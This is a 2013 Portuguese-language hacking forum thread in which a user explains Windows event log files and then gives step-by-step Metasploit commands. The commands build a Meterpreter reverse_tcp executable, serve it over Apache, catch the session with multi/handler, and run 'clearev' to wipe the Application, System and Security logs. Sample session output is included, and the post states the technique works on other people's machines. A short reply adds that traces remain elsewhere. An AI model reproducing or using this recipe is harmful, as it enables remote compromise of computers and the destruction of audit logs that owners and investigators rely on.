seja bem vindo ao forum eof, caso nao seja cadastrado se cadastre para poder visualizar todo o conteudo ^^

Você não está conectado. Conecte-se ou registre-se

 » Sistema Operacional » Windows » Acabando com alguns logs em windows

Acabando com alguns logs em windows

Ir em baixo  Mensagem [Página 1 de 1]

1 Acabando com alguns logs em windows em Qui Abr 04, 2013 9:17 pm

MysteryMind

avatar
avançado
avançado
Bom galera tava sem nada para fazer intao resolvi fazer um post pra tentar acabar com logs no windows;
Em computação, log de dados é uma expressão utilizada para descrever o processo de registro de eventos relevantes num sistema computacional. Esse registro pode ser utilizado para restabelecer o estado original de um sistema ou para que um administrador conheça o seu comportamento no passado. Um arquivo de log pode ser utilizado para auditoria e diagnóstico de problemas em sistemas computacionais.

Os logs de máquinas Windows podem ser localizados em: c:\WINDOWS\System32\
Config e são eles:
 AppEvent.Evt - armazena logs de aplicativos e operações;
 SecEvent.Evt - armazena logs de segurança;
 SysEvent.Evt - armazena eventos do sistema.

Existem mais uma grande quantidade de logs de programas , mas esses seriam como os principais.
Bom gente voce poderia tentar excluir esses arquivos ou modifica-los mas dificilmente teria sucesso.
Baseado nisso ai um jeito mais simples de meio que acabar com logs de windows por meterpreter.

Isso pode parecer ate meio estranho mas para acabar com esses logs de maneira mais facil vamos abrir uma sessao do meterpreter no seu computador.
Pra isso vamos usar uma maquina virtual do BackTrack em conjunto com windows mas só o metasploit no windows ja resolveria
primeiro pegue seu ip com ifconfig depois so fazer isso la em baixo:

msfpayload windows/meterpreter/reverse_tcp LHOST=SEU IP DO IFCONFIG LPORT= UMA PORTA QUALQUER TIPO 4444 X>/var/www/arquivo.exe

exemplo: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4444 X>/var/www/meterpreter.exe
ja jogamos na pasta do apache intao so iniciar com o comando
/etc/init.d/apache2 start

depois abram o metasploit
use exploit/multi/handler
set LHOST 192.168.1.102
set LPORT 4444
set payload windows/meterpreter/reverse_tcp
exploit

agora simplesmente abra o navegador no ip 192.168.1.102/meterpreter.exe ou o nome que tiver colocado
depois de baixado ira aparecer tipo isso
[*] Sending stage (749056 bytes) to 192.168.42.128
[*] Meterpreter session 1 opened (192.168.42.129:4444 ->
192.168.42.128:1031) at 2012-05-22 15:37:35 -0300

meterpreter>

agora simples escreva clearev e veja
meterpreter>clearev
[*] Wiping 71 records from Application…
[*] Wiping 182 records from System…
[*] Wiping 84 records from Security…

Prontinho galera se voce abrir os arquivos citados acima vao ver a diferença de antes para hoje.
Bom mostrei aqui de exemplo e em uma maquina local ,
De qualquer forma qualquer sessao meterpreter que voce abrir apenas com o comando clearev pode fazer isso
Isso pode ser usado tanto em sua maquina quanto em outras maquinas
vlw galera é isso


_________________ASSINATURA_________________
"Novo ano, mais tédio, mais escola, mais conhecimentos"
Nao ta ruim assim não né?

2 Re: Acabando com alguns logs em windows em Sex Abr 12, 2013 10:19 am

0x06

avatar
postador
postador
porém vale lembrar que Há 3 DDL's no Windows pela qual ainda conterá os logs..
fora essa forma de apagar os logs ainda existem mais algumas.

Voltar ao Topo  Mensagem [Página 1 de 1]

Permissão deste fórum:
Você não pode responder aos tópicos neste fórum